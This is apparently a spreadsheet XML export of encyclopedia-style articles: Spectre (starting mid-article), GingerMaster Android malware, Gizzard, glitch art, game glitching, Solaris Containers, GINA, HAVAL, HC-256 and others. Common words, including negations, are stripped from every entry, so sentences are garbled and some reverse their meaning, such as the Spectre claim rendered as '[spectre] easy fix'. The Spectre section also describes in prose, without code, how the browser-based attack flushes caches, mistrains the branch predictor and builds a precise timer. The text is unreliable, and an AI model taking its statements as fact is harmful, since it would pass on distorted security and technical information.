synthesizes results return-oriented programming exploits principles simple example program javascript snippet sandboxing browser; cases, entire address space victim process (i.e. contents running program) shown readable simply exploiting speculative execution conditional branches code generated stock compiler javascript machinery present existing browser. basic idea search existing code places speculation touches upon otherwise inaccessible data, manipulate processor state speculative execution contact data, time side effect processor faster, by-now-prepared prefetch machinery indeed load cache line. finally, paper concludes generalizing attack non-functional state victim process. briefly discusses even highly non-obvious non-functional effects arbitration latency.meltdown used read privileged memory process's address space even process would normally unable access unprotected oses includes data belonging kernel processes). shown, certain circumstances, spectre vulnerability also capable reading memory outside current processes memory space. meltdown paper distinguishes vulnerabilities thus: "meltdown distinct spectre attacks several ways, notably spectre requires tailoring victim process's software environment, applies broadly cpus mitigated kaiser." remote exploitation while spectre simpler exploit compiled language locally executing machine code, also remotely exploited code hosted remote malicious pages, example interpreted languages like javascript, locally using browser. scripted malware would access memory mapped address space running browser.the exploit using remote javascript follows similar flow local machine code exploit: flush cache mistrain branch predictor timed reads (tracking miss). absence availability clflush instruction (cache-line flush) javascript requires alternate approach. there several automatic cache eviction policies choose, attack relies able force eviction exploit work. found using second index large array, kept several iterations behind first index, would cause least recently used (lru) policy used. this allows exploit effectively clear cache incremental reads large dataset. branch predictor would mistrained iterating large dataset using bitwise operations setting index in-range values, using out-of-bounds address final iteration. high-precision timer would required order determine reads cache-hit cache-miss. while browsers like chrome, firefox, browser (based firefox) placed restrictions resolution timers (required spectre exploit determine cache hit/miss), time authoring white paper, spectre author able create high-precision timer using worker feature html5. careful coding analysis machine code executed just-in-time compilation (jit) compiler required ensure cache-clearing exploitive reads optimized-out. impact 2018, almost every computer system affected spectre, including desktops, laptops, mobile devices. specifically, spectre shown work intel, amd, arm-based, processors. intel responded reported security vulnerabilities official statement. originally acknowledged vulnerability spectre variants (gpz variant stated vulnerability another (gpz variant demonstrated processors, claiming posed "near zero risk exploitation" differences architecture. update nine days later, said "gpz variant 2...is applicable processors" defined upcoming steps mitigate threat. several sources took amd's news vulnerability variant change amd's prior claim, though maintained position changed.researchers indicated spectre vulnerability possibly affect intel, amd, processors. specifically, processors speculative execution affected vulnerabilities.arm reported majority processors vulnerable, published list specific processors affected spectre vulnerability: cortex-r7, cortex-r8, cortex-a8, cortex-a9, cortex-a15, cortex-a17, cortex-a57, cortex-a72, cortex-a73 cortex-a75 cores. other manufacturers' custom cores implementing instruction set, found newer members apple series processors, also reported vulnerable. general, higher-performance cpus tend intensive speculative execution, making vulnerable spectre.spectre potential greater impact cloud providers meltdown. whereas meltdown allows unauthorized applications read privileged memory obtain sensitive data processes running cloud server, spectre allow malicious programs induce hypervisor transmit data guest system running mitigation since spectre represents whole class attacks, likely, cannot single patch while work already done address special cases vulnerability, original website devoted spectre meltdown states: [spectre] easy fix, haunt long time." time, according dell: 'real-world' exploits vulnerabilities [i.e., meltdown spectre] reported date february 2018], though researchers produced proof-of-concepts."several procedures help protect home computers related devices vulnerability published. spectre patches reported significantly slow performance, especially older computers; newer eighth-generation core platforms, benchmark performance drops 2–14 percent measured. january 2018, unwanted reboots, even newer intel chips, meltdown spectre patches, reported. suggested cost mitigation alleviated processors feature selective translation lookaside buffer (tlb) flushing, feature called process-context identifier (pcid) intel architecture, alpha, address space number (asn). this selective flushing enables behavior crucial exploit isolated across processes, without constantly flushing entire primary reason cost mitigation.in march 2018, intel announced developed hardware fixes meltdown spectre-v2 only, spectre-v1. vulnerabilities mitigated partitioning system improves process privilege-level separation.on october 2018, intel reported added hardware firmware mitigations regarding spectre meltdown vulnerabilities coffee lake-r processors onwards.on january 2018, google detailed technique security blog called "retpoline" (return trampoline) overcome spectre vulnerability negligible amount processor overhead. involves compiler-level steering indirect branches towards different target result vulnerable speculative out-of-order execution taking place. while developed instruction set, google engineers believe technique transferable processors well.on january 2018, current status possible future considerations solving meltdown spectre vulnerabilities presented.on october 2018, researchers suggested mitigation approach, called dawg (dynamically allocated guard), promise better security without compromising performance.on april 2019, researchers diego university virginia proposed context-sensitive fencing, microcode-based defense mechanism surgically injects fences dynamic execution stream, protecting number spectre variants degradation performance. linux when intel announced spectre mitigation switched "security feature" instead always-on bugfix, linux creator linus torvalds called patches "complete utter garbage". ingo molnár suggested function tracing machinery linux kernel spectre without indirect branch restricted speculation (ibrs) microcode support. this would, result, performance impact processors based intel skylake newer architecture. this ftrace retpoline-based machinery incorporated linux 4.15 january 2018. linux kernel provides sysfs interface enumerate current status system regarding spectre /sys/devices/system/cpu/vulnerabilities/ microsoft windows march 2019, microsoft reported released important windows (v1809) software mitigation spectre vulnerability. other software several procedures help protect home computers related devices vulnerability published.initial mitigation efforts entirely without incident. first, spectre patches reported significantly slow performance, especially older computers. newer eighth generation core platforms, benchmark performance drops 2–14 percent measured. january 2018, unwanted reboots reported even newer intel chips.since exploitation spectre javascript embedded websites possible, planned include mitigations attack default chrome chrome users could manually mitigate attack enabling site isolation feature (chrome://flags#enable-site-per-process).as firefox 57.0.4, mozilla reducing resolution javascript timers help prevent timing attacks, additional work time-fuzzing techniques planned future releases.on january 15th, 2018, microsoft introduced mitigation spectre visual studio. this applied using /qspectre switch. developer would need download install appropriate libraries using visual studio installer. immune hardware arm:a53 also transient execution vulnerabilities hammer spoiler (security vulnerability) references further reading kocher, paul; genkin, daniel; gruss, daniel; haas, werner; hamburg, mike; lipp, moritz; mangard, stefan; prescher, thomas; schwarz, michael; yarom, yuval (2018). "spectre attacks: exploiting speculative execution" (pdf). archived (pdf) original 2018-01-03. "writeup (59.9 project zero monorail". bugs.chromium.org. kiriansky, vladimir; waldspurger, carl; schwarz, michael; lipp, moritz; berg, benjamin; ortner, philipp; piessens, frank; evtyushkin, dmitry; gruss, daniel (2018). systematic evaluation transient execution attacks defenses". arxiv:1811.05441v3 [cs.cr]. external links website detailing meltdown spectre vulnerabilities, hosted graz university technology google project zero write-up meltdown/spectre checker gibson research corporation spectre meltdown vulnerability/mitigation checker linux</t>
  </si>
  <si>
    <t>GingerMaster</t>
  </si>
  <si>
    <t>gingermaster malware affects android operating system version 2.3. first detected august 2011. history gingermaster android malware contains root exploit packaged within infected app. gingermaster's root exploit "killinginthenameofgingerbreakzegrush" process ginegermaster acts normal application users phone, application launched android device, acquires root privileges gingerbreak device accesses sensitive data. once gingermaster root access install root shell future malicious use. function gingermaster steals data card number phone number imei number imsi number screen resolution native time also brain test dendroid (malware) computer virus file binder individual mobility malware trojan horse (computing) worm (computing) mobile operating system references</t>
  </si>
  <si>
    <t>Gizzard (Scala framework)</t>
  </si>
  <si>
    <t>gizzard open source sharding framework create custom fault-tolerant, distributed databases. initially used twitter emerged wide variety data storage problems. gizzard operates middleware networking service runs java virtual machine. manages partitioning data across arbitrary backend datastores, allows accessed efficiently. partitioning rules stored forwarding table maps ranges partitions. each partition manages replication declarative replication tree. gizzard handles physical logical shards. physical shards point physical database backend whereas logical shards trees shards. addition gizzard also supports migrations gracefully handles failures. system made eventually consistent requiring write operations idempotent commutative. operations fail retried later time. gizzard available github licensed apache license 2.0. also distributed hash table (dht) distributed database flockdb references external links project website</t>
  </si>
  <si>
    <t>Glass break detector</t>
  </si>
  <si>
    <t>glass break detector sensor detects pane glass shattered broken. these sensors commonly used near glass doors glass storefront windows. they widely used electronic burglar-alarm systems. detection process begins microphone picks noises vibrations coming glass. vibrations exceed certain threshold (which sometimes user selectable), analyzed detector circuitry. simpler detectors merely narrowband microphones tuned frequencies typical glass shattering. these merely designed react sound magnitudes certain threshold, whereas complex designs analytically compare sound glass-break profiles using signal transforms similar fft. these digitally sophisticated detectors react amplitude threshold statistically expressed similarity threshold breached. advances technology also wireless glass-break detectors. also chubb locks yale (company) burglar alarm references</t>
  </si>
  <si>
    <t>Glitch art</t>
  </si>
  <si>
    <t>glitch practice using digital analog errors aesthetic purposes either corrupting digital data physically manipulating electronic devices. glitches appear visual film colour (1935) lye, video sculpture magnet (1965) june paik contemporary work panasonic th-42pwd8uk plasma screen burn (2007) cory arcangel. history term technical word, glitch unexpected result malfunction, especially occurring software, video games, images, videos, audio, digital artefacts. early examples glitches used media include digital dinner (1978) created jamie fenton raul zaritsky, glitch audio done dick ainsworth. this video made manipulating bally video game console recording results videotape.the term glitch came associated music describe genre experimental/noise/electronica (see glitch music). shortly after, visual artist began embrace glitch aesthetic digital age, glitch came refer whole assembly visual arts. early movement later dubbed "net.art", including early work collective jodi, started artists joan heemskerk dirk paesmans. jodi's experiments glitch included purposely causing layout errors website order display underlying code error messages. explorations jodi net.art members would later influence visual distortion practices like databending datamoshing (see below). glitch events 2002 motherboard, tech-art collective, held first glitch symposium oslo, norway january, "bring together international artists, academics glitch practitioners short space time share work ideas public other." 2010 september thru october chicago played host first gli.tc/h, five-day conference chicago organized nick briz, evan meaney, rosa menkman satrom included workshops, lectures, performances, installations screenings. november 2011, second gli.tc/h event traveled chicago amsterdam lastly birmingham, included workshops, screenings, lectures, performance, panel discussions gallery show course seven days three cities. 2013 computer, glitch 2013 arts festival ruared, south dublin arts centre dublin, curated nora murchú. 2015 glitch dead teatr barakah warsaw, poland. curated alhague aleksandra pienkosz.refrag: glitch gaïté lyrique paris, france. organized school institute chicago parsons paris. 2017 glitch dead gamut gallery, minneapolis, minnesota, usa. curated miles taylor, alhague aleksandra pienkosz. 2018 blue\x80 nuit blanche villette makerz paris, france. curated alhague kaspar ravel.refrag cradle-to-grave espace cours paris, france. curated benjamin gaulon. 2019 communication noise exhibition, media mediterranea festival, pula, croatia. 2020 exercise meaning glitch season exhibition national gallery singapore. curated syaheedah iskandar. 2021 glitch iran. prima mostra artistica collettiva. methods what called "glitch art" typically means visual glitches, either still moving image. made either "capturing" image glitch randomly happens, often artists/designers manipulating digital files, software hardware produce "errors." artists posted variety tutorials online explaining make glitch art. there many approaches making glitches happen demand, ranging physical changes hardware direct alternations digital files themselves. artist michael betancourt identified five areas manipulation used create "glitchart." betancourt notes "glitch art" defined broad range technical approaches identified changes made digital file, generative display, technologies used show (such video screen). includes within range changes made analog technologies television video art) physical film strip motion pictures. data manipulation data manipulation (aka databending) changes information inside digital file create glitches. databending involves editing changing file data. there variety tutorials explaining make changes using programs hexfiend. adam woodall explains tutorial: like files, image files (.jpg .bmp .gif etc) made text. unlike files, like .svg (vectors) .html (web pages), image opened text editor comes gobbldygook! related processes datamoshing changes data video picture file. datamoshing software avidemux common method creating glitch manipulating different frame types compressed digital video: datamoshing involves removal encoded video’s i-frames (intra-coded picture, also known frames—a frame require information regarding another frame decoded), leaving (predicted picture) (bi-predictive picture) frames. p-frames contain information predicting changes image current frame previous one, b-frames contain information predicting image differences previous, current subsequent frames. because b-frames data previous forward frames, compressed i-frames. this process direct manipulation digital data restricted files appear digital screens. model glitching" refers purposeful corruption code animation programs resulting distorted abstract images virtual worlds, models even printed objects. misalignment misalignment glitches produced opening digital file type program designed different type file, opening video file sound file, using wrong codec decompress file. tools commonly used create glitches type include audacity wordpad. artist jamie boulton explains process glitches produces, noting glitches depend audacity handles files, even audio-encoded: easiest manipulate file audacity select section file apply built sound effects now, computing whizz kid, apply sound effect sound file, program takes file alters file data manner it’s told achieve effect. example, apply echo effect would repeat parts file, diminishing repetition iteration. wonderful thing regardless file actually audacity doesn’t know care whether file sound not, alter manner instructed. hardware failure hardware failure happens altering physical wiring internal connections machine itself, short circuit, process called "circuit bending" causes machine create glitches produce sounds visuals. example, damaging internal pieces something like player, achieve different colorful visual images. video artist defanti explained role hardware failure voice-over jamie fenton's early glitch video digital dinner used bally video game console system: this piece represents absolute cheapest home computer art. this involves taking $300 video game system, pounding fist cartridge pops trying write menu. music done dick ainsworth using system, pounding fingers instead fist. physically beating case game system would cause game cartridge out, interrupting computer's operation. glitches resulted failure result machine there memory cartridge memory built console. popping cartridge executing code console created garbage references stack frames invalid pointers, caused strange patterns drawn. bally astrocade unique among cartridge games designed allow users change game cartridges power-on. when pressing reset button, possible remove cartridge system induce various memory dump pattern sequences. digital dinner collection curious states silicon epilepsy music composed generated upon platform. misregistration misregistration produced physical noise historically analog media motion picture film. includes dirt, scratches, smudges markings distort physical media also impact playback digital recordings media dvds, electronic music composer cascone explained 2002: "there many types digital audio ‘failure.' sometimes, results horrible noise, times produce wondrous tapestries sound. adventurous ears, quite often same.) when german sound experimenters known oval started creating music early 1990s painting small images underside make skip, using aspect ‘failure' work revealed subtextual layer embedded compact disc. oval's investigation ‘failure' new. much work previously done area optical soundtrack work laszlo moholy-nagy oskar fischinger, well vinyl record manipulations john cage christian marclay, name few. what ideas travel speed light spawn entire musical genres relatively short period time." distortion distortion earliest types glitch produced, work video artist june paik, created video distortions placing powerful magnets close proximity television screen, resulting appearance abstract patterns. paik's addition physical interference created kinds imagery changed broadcast image displayed: magnetic field interferes television’s electronic signals, distorting broadcast image abstract form changes magnet moved. recording resulting analog distortions camera, shown without need magnet. compression artifacts noticeable distortion media (including images, audio, video) caused application lossy compression. they intentionally used visual style glitch art. rosa menkman's work makes compression artifacts, particularly discrete cosine transform blocks (dct blocks) found digital media data compression formats jpeg digital images digital audio. another example jpegs german photographer thomas ruff, uses intentional jpeg artifacts basis picture's style. also databending distortion (optics) electronic glitch (music) glitching internet list glitch artists net.art media postdigital vjing wabi-sabi references further reading almond, richard. "fading mnemonics digital decay", 2009 baker-smith, ben. "flickr glitch artists", 2010 betancourt, michael. "welcome cyberia", miami exchange, september 2003. betancourt, michael. "critical glitches glitch art", 2014 betancourt, michael (2016). glitch theory practice: critical failures post-digital aesthetics (1st ed.). york: routledge focus. isbn 978-1138219540. bosma, josephine. "interview jodi", 1997 briz, nick. thoughts glitch(art)v2.0, 2015 briz, nick. glitch art, 2009 donaldson, jeff. "glossing thoughts glitch: poetry error". artpulse magazine vol. (spring 2011) downey, jonas. "glitch art". ninth letter (2012). retrieved february 2013. gaulon, benjamin. defunct refunct publication, exhibition catalogue, 2011 geere, duncan (august 2010). "glitch created 'databending'". wired wired.co.uk. archived original 2010-08-18. germen, murat. "inadvertent accidentalis." international symposium computational aesthetics graphics, visualization, imaging (cae 2008), lisbon, portugal. goriunova, olga alexei shulgin. "glitch," software studies: lexicon, matthew fuller (cambridge, press, 2008) grenzfurthner, johannes. interview phil stearns. pixel form, 2010 krapp, peter. noise channels: glitch error digital culture, minneapolis: university minnesota press 2011. manon, hugh daniel temkin, "notes glitch", 2011 menkman, rosa. glitch moment(um), network notebooks institute network cultures, amsterdam., 2011. isbn 9789081602167 moradi, iman. "seeking perfect imperfection: personal retrospective glitch art. vector (e-zine) (july 2008). retrieved july 2011 moradi, iman (2009). glitch designing imperfection (1st ed.). york: mark batty publisher. isbn 978-0979966668. poremba, cindy. "point shoot: remediating photography gamespace." games culture volume number (january 2007): 49–58. russel, legacy. "glitch feminism: manifesto." verso 2020. external links media related glitch wikimedia commons glitch documentary produced series book glitch theory wiki archive.org</t>
  </si>
  <si>
    <t>Glitch removal</t>
  </si>
  <si>
    <t>glitch removal elimination glitches—unnecessary signal transitions without functionality—from electronic circuits. power dissipation gate occurs ways: static power dissipation dynamic power dissipation. glitch power comes dynamic dissipation circuit directly proportional switching activity. glitch power dissipation 20%–70% total power dissipation hence glitching eliminated power design. switching activity occurs signal transitions types: functional transition glitch. switching power dissipation directly proportional switching activity (α), load capacitance (c), supply voltage (v), clock frequency α·c·v2·fswitching activity means transition different levels. glitches dependent signal transitions glitches results higher power dissipation. equation switching power dissipation controlled controlling switching activity (α), voltage scaling etc. glitch reduction techniques reducing switching activity discussed, transition results glitches hence power dissipation. minimize glitch occurrence, switching activity minimized. example, gray code could used counters instead binary code, since every increment gray code flips bit. gate freezing gate freezing minimizes power dissipation eliminating glitching. relies availability modified standard library cells so-called f-gate. this method consists transforming high glitch gates modified devices filter glitches control signal applied. when control signal high, f-gate operates normal control signal low, gate output disconnected ground. result never discharged logic glitches prevented. hazard filtering balanced path delay hazards digital circuits unnecessary transitions varying path delays circuit. balanced path delay techniques used resolving differing path delays. make path delays equal, buffer insertion done faster paths. balanced path delay avoid glitches output. hazard filtering another remove glitching. hazard filtering gate propagation delays adjusted. this results balancing path delays output. hazard filtering preferred path balancing path balancing consumes power insertion additional buffers. gate sizing gate upsizing gate downsizing techniques used path balancing. gate replaced logically equivalent differently-sized cell delay gate changed. because increasing gate size also increases power dissipation, gate-upsizing used power saved glitch removal power dissipation increase size. gate sizing affects glitching transitions affect functional transition. multiple threshold transistor delay gate function threshold voltage. non-critical paths selected threshold voltage gates paths increased. this results balanced propagation delay along different paths converging receiving gate. performance maintained since determined time required critical path. higher threshold voltage also reduces leakage current path. also filter capacitor operand isolation power dissipation dynamic voltage scaling clock gating encoding rechargeable battery switching losses references further reading hyungoo, lee; hakgun, shin; juho, (2004). "glitch elimination gate freezing, gate sizing buffer insertion power optimization circuit". 30th annual conference ieee industrial electronics society, 2004. iecon 2004. vol. 2126–2131. doi:10.1109/iecon.2004.1432125. isbn 978-0-7803-8730-0. s2cid 21217122. coudert, olivier (september 1997). "gate sizing constrained delay/power/area optimization". ieee transactions very large scale integration (vlsi) systems. (4): 465–472. citeseerx 10.1.1.474.766. doi:10.1109/92.645073. sapatnekar, sachin chuang, weitong, power-delay optimizations gate sizing (pdf) shum, warren; anderson, jason (2011), fpga glitch power analysis reduction, international symposium power electronics design (islped), 27–32 zhanping, chen; liqiong, wei; kaushik, (march 1997), reducing glitching leakage power voltage cmos circuits, purdue university school electrical computer engineering external links patent us6356101 glitch removal circuitary, 2002-03-12, http://www.google.co.in/patents/us6356101. https://learn.digilentinc.com/documents/277</t>
  </si>
  <si>
    <t>Glitching</t>
  </si>
  <si>
    <t>glitching activity person finds exploits flaws glitches video games achieve something intended game designers. players engage practice known glitchers. some glitches easily achieved, others either difficult unperformable humans achieved tool-assisted input. glitches vary greatly level game manipulation, setting flag writing executing custom code within game. glitches found accident actively searched for. they require testing experimentation player repeatable level success. they achieved many different ways, often though user input game controller, also assisted though hardware manipulation. mechanics glitches well-understood, access game's code knowing properties manipulated, others performable mechanic unknown. some glitches consistently performable uncontrollable factors, usually broadly referred random number generation (frequently called rng). glitching used speedrunning competitive gaming, well tool gain insight game's underlying technical mechanics code. contexts, considered form cheating, competitions disallow certain glitches allow fair entertaining experience. many speedrunning communities create separate categories runs either restrict allow certain glitches, giving speedrunners freedom choose category suits interests goals. overview common glitches video games clipping, used pass though wall barrier access certain areas would inaccessible normal gameplay. these areas could bounds, player-character place never intended game developers, could used form sequence breaking, means accessing region locked, entering locked room without key. glitches bounds mostly performed either moving walls corners jumping places invisible walls. areas, many maps hollow objects player move freely. these objects usually distance decoration, lacking collision detection. example, tony hawk's underground l.a. level glitch allow players leave provided play area pass background. massively multiplayer online game need speed: world also city rockport, player glitch point camden near bridge. clipping exploited speedrunners engage sequence breaking games like metroid prime, cause behave abnormally especially code address players fall bottomless glitching wall ground collision. such glitches also allow players areas supposed entering beta areas grand theft auto using helicopter clip ground map. another common type glitch item manipulation, player manipulate inventory certain items. this also expanded changing player's health, magic power, inventory capacity, quest status, item durability, these manipulations often limited game's boundaries, allow player access glitched items. players obtain high amount resources trying acquire negative values certain resource counters coded handle them. example playstation xbox versions fifa game check negative values player's currency counter, meaning player cancels loan enough currency available transfer budget, currency counter roll back highest number, granting player large amount wealth. glitches also affect physics particular games, alter state gravity, movement speed, even allow teleportation. famous physics found grand theft auto particular swingset violently catapult anyone anything touches chains approaches great distance, coding flaws concerning physics swing chains. grand theft auto grand theft auto also similar physics approaching certain closed gates would cause player character vehicle launched great distance. there also glitches require action part player, glitch ncaa football cause football game longer time indicated clock and, often, indefinitely.such glitches hurt competitive atmosphere online multiplayer games. example, reports online multiplayer mode transformers: cybertron suffered hacking glitches allow players manipulate classes stats methods normally available regular players. memory manipulation arbitrary code execution advanced form glitching allows player access parts game's memory order change state gameplay. this done executing movements changing positions entities, sprites, actors specific particular memory addresses order gives player ability alter aspect game, expanded giving player ability execute custom code. this possible super mario world, player causes entities koopa shells, brick particles, fireballs despawn certain coordinates, memory read executed code. another example altering code legend zelda: ocarina time, player locks states certain actors memory unloading certain order, link pick item angle rotation linked different memory address, value determine boots wearing. done correctly, player could obtain glitched version boots called boots" gravity all, allowing link desired.in instances, glitches physically impossible human require inputs frame-perfect accuracy precision, simply impossible physical controller. glitches like often require pressing several buttons frames second, potentially complex combinations, pressing left right d-pad. this solved using tools automatically sends inputs game, macro emulator. hardware manipulation some glitches occur physically manipulating hardware game system, ejecting disc gameplay slightly tilting cartridge position. somewhat extreme example hardware manipulation noticing certain glitch seemed work summer, japanese speedrunner hitshee discovered heating famicom certain temperature caused glitch save files dragon quest iii, keeps console plate speedruns. also circuit bending fuzzing glitch references</t>
  </si>
  <si>
    <t>Solaris Containers</t>
  </si>
  <si>
    <t>solaris containers (including solaris zones) implementation operating system-level virtualization technology sparc systems, first released publicly february 2004 build beta solaris subsequently first full release solaris 2005. present illumos (formerly opensolaris) distributions, openindiana, smartos, tribblix omnios, well official oracle solaris release. solaris container combination system resource controls boundary separation provided zones. zones completely isolated virtual servers within single operating system instance. consolidating multiple sets application services onto system placing isolated virtual server containers, system administrators reduce cost provide protections separate machines single machine. terminology name technology changed development pre-launch public events. before launch solaris zones 2005, solaris container type workload constrained solaris resource management features. latter separate software package earlier history. 2007 term solaris containers came mean solaris zone combined resource management controls. later, gradual move solaris containers specifically referred non-global zones, without additional resource management. zones hosted global zone known "non-global zones" sometimes called "zones". term "local zone" specifically discouraged, since usage "local" antonym "global". global zone visibility resource system, whether associated global zone non-global zone. unless otherwise noted, "zone" refer non-global zones article. simplify terminology, oracle dropped term container solaris reverted term solaris zone irrespective resource management controls. description each zone node name, access virtual physical network interfaces, storage assigned requirement zone minimum amount dedicated hardware disk storage necessary unique configuration. specifically, require dedicated cpu, memory, physical network interface hba, although allocated specifically zone.each zone security boundary surrounding prevents process associated zone interacting observing processes zones. each zone configured separate user list. system automatically manages user conflicts; zones system could user 10000 defined, would mapped unique global identifier.a zone following states: configured: configuration completed committed. incomplete: transition state install uninstall operation. installed: packages successfully installed. ready: virtual platform established. running: zone booted successfully running. shutting down: zone process shutting temporary state, leading "down". down: zone completed shut process temporary state, leading "installed".some programs cannot executed within non-global zone; typically application requires privileges cannot granted within container. zone separate kernel contrast hardware virtual machine), applications require direct manipulation kernel features, ability directly read alter kernel memory space, work inside container. resources needed zones induce overhead memory. most types zones share global zone's virtual address space. zone assigned resource pool (processor plus scheduling class) guarantee certain usage, capped fixed compute capacity ("capped cpu") given shares fair-share scheduling.currently maximum 8191 non-global zones created within single operating system instance. "sparse zones", filesystem content shared global zone, take little disk space. "whole root zones", zone copy operating system files, occupy anywhere several hundred megabytes several gigabytes, depending installed software. 8191 limits arises limit 8,192 loopback connections solaris instance. each zone needs loopback connection. global zone gets one, leaving 8,191 non-global zones. even whole root zones, disk space requirements negligible zone's file system clone global zone image, since blocks different snapshot image need stored disk; method also makes possible create zones seconds. branded zones although zones system share common kernel, additional feature added called branded zones (brandz short). this allows individual zones behave manner default brand global zone. existing brands (october 2009) grouped categories: brands perform system call translation: 'native' default solaris 'ipkg' default opensolaris, openindiana, omnios 'joyent' default smartos 'cluster' used solaris cluster zones 'labeled' used zones solaris trusted extensions environment brands perform system call translation: 'solaris8' provides solaris environment solaris system, including translation solaris system calls solaris system calls (available sparc systems) 'solaris9' provides solaris environment solaris system, including translation solaris system calls solaris system calls (available sparc systems) 'lx' provides enterprise linux environment solaris system, including translation rhel system calls solaris system calls (available systems). smartos, brand zones provide runtime modern linux distributions including ubuntu, debian, centos, alpine others. support upstreamed illumos. 's10brand' provides solaris environment opensolaris oracle solaris system, including translation solaris system calls opensolaris/oracle solaris system calls 'solaris-kz' provides separate solaris 11.2 newer instance, kernel independent packages, oracle solaris 11.2 newer system. this feature first available publicly solaris 11.2 beta (public download).the brand zone time zone created. second category implemented interposition points within kernel used change behavior syscalls, process loading, thread creation, elements. 'lx' brand, libraries equivalent distribution centos required complete emulated environment. documentation solaris operating system provides pages solaris containers default; detailed documentation found various on-line technical resources. first published document hands-on reference solaris zones written february 2004 dennis clarke blastwave, providing essentials getting started. this document greatly expanded upon brendan gregg july 2005. solaris solaris containers documented detail dennis clarke blastwave april 2008. blastwave solaris solaris containers document early release cycle solaris containers technology actions implementation blastwave resulted followup microsystems marketing. book oracle solaris system virtualization essentials written jeff victor, al., offers feature details best practices. more extensive documentation found oracle documentation site. implementation issues solaris 10/08, branded zones supported sun4us architecture (fujitsu primepower servers) packages fjsvs8brandr fjsvs9brandr. also operating system-level virtualization operating system-level virtualization implementations comparison platform virtualization software virtual machines references external links documentation solaris zones (containers) document started creating oracle solaris zones oracle solaris blogs devoted oracle solaris zones jeff victor's blog mike gerdts' blog moving solaris zones patent: 7437556, tucker, andrew beck, john comay, david al., "global visibility controls operating system partitions", published 2004-11-10, assigned microsystems inc. also 1475703</t>
  </si>
  <si>
    <t>Grant table</t>
  </si>
  <si>
    <t>grant table interface grants access memory pages virtual machines pages. grant tables implemented hypervisor. applications grant tables generally used inter-virtual machine communication, communicating vm's requires pages owned references</t>
  </si>
  <si>
    <t>Graphical identification and authentication</t>
  </si>
  <si>
    <t>graphical identification authentication (gina) component windows 2000, windows windows server 2003 provides secure authentication interactive logon services. gina replaceable dynamically linked library loaded early boot process context winlogon machine started. responsible handling secure attention sequence, typically control-alt-delete, interacting user sequence received. gina also responsible starting initial processes user (such windows shell) first gina discontinued windows vista. overview default gina library, msgina.dll, provided microsoft part operating system, offers following features: authentication windows domain servers supplied user name/password combination. displaying legal notice user prior presenting logon prompt. automatic logon, allowing user name password stored used place interactive logon prompt. automatic logon also configured execute certain number times reverting interactive logon. older versions windows password could stored plain text registry; support using local security authority's private storage capabilities introduced windows workstation service pack windows server 3.51. "security options" dialog user logged provides options shut down, off, change password, start task manager, lock workstation.winlogon configured different gina, providing non-standard authentication methods smart card readers identification based biometrics, provide alternate visual interface default gina. developers implement replacement gina required provide implementations calls cover functionality displaying "workstation locked" dialog, processing secure attention sequence various user states, responding queries whether locking workstation allowed action, supporting collection user credentials terminal services-based connections, interacting screensaver. custom gina could made entirely scratch, original gina modifications. custom gina specified placing string named ginadll registry location hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon. winlogon component solely responsible calling apis gina library. when winlogon process starts, compares version number supported loaded gina library. gina library higher version winlogon, windows boot. this done gina library written given version winlogon expect certain calls provided winlogon. support replaceable gina dlls introduced windows server 3.51 windows workstation sp3. successive versions windows introduced additional functionality winlogon, resulting additional functionality implemented replacement gina. windows 2000, example, introduced support displaying status messages (including verbose messages turned group policy) current state user (e.g. "applying computer settings."), starting applications user's context; facilitates restarting windows explorer automatically crashes, well starting task manager. windows introduced support fast user switching, remote desktop interactive, simplified user-friendly full-screen logon. life windows vista, gina replaced credential providers, allow significantly increased flexibility supporting multiple credential collection methods. support multiple gina models, complex chaining method used required custom ginas often work fast user switching. gina libraries work windows vista later windows versions. difference, however, gina could completely replace windows logon user interface; credential providers cannot. also list microsoft windows components winlogon windows startup process references external links winlogon gina, developer information login components interact customizing gina part developer tutorial writing custom gina. customizing gina part developer tutorial writing custom gina. pgina, open source windows authentication</t>
  </si>
  <si>
    <t>HAVAL</t>
  </si>
  <si>
    <t>haval cryptographic hash function. unlike md5, like modern cryptographic hash functions, haval produce hashes different lengths bits, bits, bits, bits, bits. haval also allows users specify number rounds used generate hash. haval broken 2004.haval invented yuliang zheng, josef pieprzyk, jennifer seberry 1992. haval hashes haval hashes (also termed fingerprints) typically represented 32-, 40-, 48-, 64-digit hexadecimal numbers. following demonstrates 43-byte ascii input corresponding haval hash (256 bits, passes): haval("the quick brown jumps lazy dog", 256, b89c551cdfe2e06dbd4cea2be1bc7d557416c58ebb4d07cbc94e49f710c55be4 even small change message (with overwhelming probability) result completely different hash, e.g. changing letter produces following hash value: haval("the quick brown jumps lazy cog", 256, 60983bb8c8f49ad3bea29899b78cd741f4c96e911bbc272e5550a4f195a4077e hash zero-length string haval("", 256, be417bb4dd5cfb76c7126f4f8eeb1553a449039307b1a3cd451dbfdc0fbbe330 security research uncovered weaknesses make haval least variant bits passes operations) questionable. august 2004, collisions haval (128 bits, passes) announced xiaoyun wang, dengguo feng, xuejia lai, hongbo also hash function security summary references external links haval (the official haval page research paper haval, latest source code haval oids)</t>
  </si>
  <si>
    <t>HC-256</t>
  </si>
  <si>
    <t>hc-256 stream cipher designed provide bulk encryption software high speeds permitting strong confidence security. 128-bit variant submitted estream cipher candidate selected four final contestants software profile.the algorithm designed hongjun first published 2004. patented. function hc-256 initialization vector (nonce) bits.internally, consists secret tables each table contains 1024 32-bit words. state update 32-bit word table updated using non-linear update function. after 2048 steps elements tables updated. generates 32-bit word update step using 32-bit 32-bit mapping function similar output function blowfish cipher. finally linear bit-masking function applied generate output word. uses message schedule functions hash function sha-256 internally, tables s-boxes. hc-128 similar function, reduces length, nonce, number words tables number table updating steps half. performance performance hc-256 estimated author cycles byte pentium processor. however initialization phase cipher includes expanding 256-bit tables running cipher 4096 steps. author hc-256 estimates process take around 74,000 cycles. hc-128 encryption speed cycles byte pentium processor cited. implementation hc-128 various computing structures studied detail, significant performance gains compared naive implementation. references external links estream page hc-256</t>
  </si>
  <si>
    <t>Software Updater</t>
  </si>
  <si>
